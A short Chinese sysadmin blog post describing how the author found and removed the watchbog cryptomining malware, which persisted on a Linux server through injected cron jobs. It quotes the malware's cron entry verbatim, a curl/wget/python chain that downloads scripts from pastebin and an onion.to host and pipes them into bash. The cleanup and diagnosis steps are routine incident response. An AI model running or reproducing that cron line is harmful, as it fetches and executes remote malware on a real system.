watchbog挖矿病毒清除
收到报警,发现cpu 100%,被watchbog进程占用.

确认不是系统和公司的服务,( watchbog 这个程序想伪装成Linux看门狗watchdog ) . 杀掉, 后面又自启了. 排查原因



可以看到watchbog程序在/bin下, /tmp目录下有相关文件. 至于为啥自启? 基本可以先看定时任务了. ( 服务器没重启,自启动基本排除. 保险起见,随后可以挨个看一眼 )
把定时任务相关的文件全找一遍



cron.d目录下新增文件 :appache、root、system
cron.hourly cron.monthly 等里面都找到了相关任务.
*/11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzG
fGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://azip
lcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
解决: 把定时任务的服务先stop了. 再把刚找出来的病毒的定时任务全删除. 然后杀死进程, 把相关程序和相关文件删掉. 最后观测检查一段时间.
看到好多人说redis漏洞引起的. 但这边排查原因本次中毒应该是api接口引起的 10000这个对外端口
netstat -na|grep ESTABLISHED
netstat -lntp|grep 10000
lsof -i:10000
自用博文.不限传播.欢迎留言.共同进步.

浙公网安备 33010602011771号